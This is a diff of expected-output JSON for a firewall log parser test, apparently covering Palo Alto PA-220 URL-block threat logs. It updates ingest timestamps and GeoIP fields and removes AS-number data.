@@ -7639,7 +7419,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691904200Z", + "ingested": "2021-12-14T14:50:40.980252760Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", @@ -7667,22 +7447,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -7813,7 +7588,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691908400Z", + "ingested": "2021-12-14T14:50:40.980253095Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -7841,22 +7616,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -7987,7 +7757,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691913400Z", + "ingested": "2021-12-14T14:50:40.980253440Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8015,22 +7785,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -8161,7 +7926,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691919900Z", + "ingested": "2021-12-14T14:50:40.980253794Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8189,22 +7954,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -8335,7 +8095,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691924600Z", + "ingested": "2021-12-14T14:50:40.980254131Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8363,22 +8123,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -8509,7 +8264,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691929300Z", + "ingested": "2021-12-14T14:50:40.980254478Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8537,22 +8292,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -8683,7 +8433,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691934100Z", + "ingested": "2021-12-14T14:50:40.980254828Z", "original": "Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:13.000-05:00", "timezone": "America/New_York", @@ -8711,22 +8461,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -8857,7 +8602,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691939100Z", + "ingested": "2021-12-14T14:50:40.980255267Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -8885,22 +8630,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -9031,7 +8771,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691944200Z", + "ingested": "2021-12-14T14:50:40.980255617Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -9059,22 +8799,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -9205,7 +8940,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691950600Z", + "ingested": "2021-12-14T14:50:40.980255966Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -9233,22 +8968,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -9379,7 +9109,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691957100Z", + "ingested": "2021-12-14T14:50:40.980256374Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -9407,22 +9137,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -9553,7 +9278,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691963500Z", + "ingested": "2021-12-14T14:50:40.980256788Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -9581,22 +9306,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -9727,7 +9447,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691969800Z", + "ingested": "2021-12-14T14:50:40.980257168Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -9755,22 +9475,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -9901,7 +9616,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691976100Z", + "ingested": "2021-12-14T14:50:40.980257517Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -9929,22 +9644,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -10075,7 +9785,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691982300Z", + "ingested": "2021-12-14T14:50:40.980257861Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -10103,22 +9813,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -10249,7 +9954,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691988700Z", + "ingested": "2021-12-14T14:50:40.980258218Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -10277,22 +9982,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -10423,7 +10123,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691995100Z", + "ingested": "2021-12-14T14:50:40.980258555Z", "original": "Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -10451,22 +10151,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -10597,7 +10292,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692001400Z", + "ingested": "2021-12-14T14:50:40.980258895Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -10625,22 +10320,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -10771,7 +10461,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692007700Z", + "ingested": "2021-12-14T14:50:40.980259243Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -10799,22 +10489,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -10945,7 +10630,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692014Z", + "ingested": "2021-12-14T14:50:40.980259593Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -10973,22 +10658,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -11119,7 +10799,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692020400Z", + "ingested": "2021-12-14T14:50:40.980259934Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -11147,22 +10827,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -11293,7 +10968,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.692026700Z", + "ingested": "2021-12-14T14:50:40.980260268Z", "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", @@ -11321,22 +10996,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
